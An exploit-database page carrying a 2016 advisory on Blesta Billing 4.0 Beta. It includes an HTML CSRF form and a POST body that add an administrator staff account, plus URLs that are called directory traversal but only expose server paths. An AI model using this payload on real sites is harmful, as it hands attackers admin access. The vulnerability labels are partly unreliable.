0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Biesta Billing 4.0 Beta Cross Site Request Forgery / Traversal Vulnerabilities
Document Title: =============== Blesta Billing 4.0 Beta Multiple Vulnerabilities Credits & Authors: ================== TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com] Product & Service Introduction: =============================== Blesta is a software product of Phillips Data, Inc., founded in Y2K. First released in 2007, is e-commerce web application and billing. Blesta was rewritten and version 3.0 was released to much anticipation on Aug 14, 2013. Due to innovation, well-written code, and the support of thousands of customers worldwide, Blesta continues to be a leader in the hosting billing software space. Abstract Advisory Information: ============================== An independent researcher discovered Multiple Vulnerabilities in the official aplication Blesta 4.0 Beta Vulnerability Disclosure Timeline: ================================== 2016-28-11: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Phillips Data, Inc Product: Blesta 4.0 Blesta https://www.blesta.com/ Severity Level: =============== High Technical Details & Description: ================================ A client-side cross site request forgery vulnerability has been discovered in the official Blesta billing web-application. The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism. The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of Blesta connect service panel staff.The web vulnerability can be exploited by any attackers. Proof of Concept CSRF (PoC): ============================ <html> <div class="content_section"><div class="common_box_content"> <div class="inner"> <form id="staff" action="http://sitio.com/facturacin/admin/settings/system/staff/add/" method="post"> <input type="hidden" value="3c1806600ab6d12c5b1496586f7f0c8ab59bd5cb67b2e35c2578ead5382790e2" name="_csrf_token"> <div class="title_row first"> <h3>Contact Info</h3> </div> <div class="pad"> <ul> <li> <label for="first_name">First Name</label> <input type="text" id="first_name" value="primernombre" name="first_name"> </li> <li> <label for="last_name">Last Name</label> <input type="text" id="last_name" value="segundonombre" name="last_name"> </li> <li> <label for="email">E-mail</label> <input type="text" id="email" value="micorreo@buhosec.com" name="email"> </li> </ul> </div> <div class="title_row"> <h3>Authentication</h3> </div> <div class="pad"> <ul> <li> <label for="user_email">Username</label> <input type="radio" checked="checked" id="user_email" value="email" name="username_type"> <label class="inline" for="user_email">Use the email address as the username</label> <input type="radio" id="username_type" value="user" name="username_type" checked="checked"> <label class="inline" for="username">Enter a username</label> <input type="text" id="username" value="usuariologin" name="username"> </li> <li> <label for="new_password">Password</label> <input type="password" id="last_name" value="tupassword123" name="new_password"> </li> <li> <label for="confirm_password">Confirm Password</label> <input type="password" id="confirm_password" value="tupassword123" name="confirm_password"> </li> <div class="title_row"> <h3>Groups</h3> </div> <div class="pad"> <table> <tbody><tr> <td>Member Groups</td> <td></td> <td>Available Groups</td> </tr> <tr> <td> <select multiple="multiple" class="groups" id="assigned" name="groups[1]"> <option value="1">Administrators - Mi facturaciA3n</option></select> </td> <td><a class="move_left" href="#">&nbps;</a> &nbps; <a class="move_right" href="#">&nbps;</a></td> <td> <select multiple="multiple" class="groups" id="available" name="available[]"> <option value="2">Billing - Mi facturaciA3n</option> </select> </td> </tr> </tbody></table> </div> <div class="button_row"><a href="http://sitio.com/facturacin/admin/settings/system/staff/add/#" class="btn_right submit">Create Staff</a></div> </form> </div> </div> </div> </html> Send Post (PoC): ================ _csrf_token=3c1806600ab6d12c5b1496586f7f0c8ab59bd5cb67b2e35c2578ead5382790e2&first_name=primernombre&last_name=segundonombre&email=micorreo%40buhosec.com&username_type=user&username=usuariologin&new_password=tupassword123&confirm_password=tupassword123&two_factor_mode=none&two_factor_key=af61733cb012a19f62edb5a7c913ca0eea70c38d&two_factor_pin=&groups%5B%5D=1 Proof of Concept Directory Traversal 1 Path /form > form.php (PoC): =================================================================== http://sitio.com/facturacin/helpers/form/form.php Fatal error: Class 'Loader' not found in /home/usuariohost/public_html/sitio.com/facturacin/helpers/form/form.php on line 2 Proof of Concept Directory Traversal 2 Path Config > i18.php (PoC): =================================================================== http://sitio.com/facturacin/config/i18.php Fatal error: Class 'Configure' not found in /home/usuariohost/public_html/sitio.com/facturacin/config/i18.php on line 2 Proof of Concept Directory Traversal 3 Path vendors > h2o > ext > adminmedia.php (PoC): ======================================================================================= http://sitio.com/facturacin/vendors/h2o/ext/adminmedia.php Fatal error: Class 'H2o_Node' not found in /home/usuariohost/public_html/sitio.com/facturacin/vendors/h2o/ext/adminmedia.php on line 3 Proof of Concept CSRF Vulnerability (IMAGES): ============================================= 1. http://i.imgur.com/kkIAnvJ.png 2. http://i.imgur.com/zOY1ia3.png Proof of Concept Directory Traversal (IMAGES): ============================================= 1. http://i.imgur.com/jKjXzWb.png 2. http://i.imgur.com/zqOoL3I.png 3. http://i.imgur.com/Iuf2Oz6.png #Taurusomar_ #Taurusomar #Buhosec #InfoSec # 0day.today [2024-11-16] #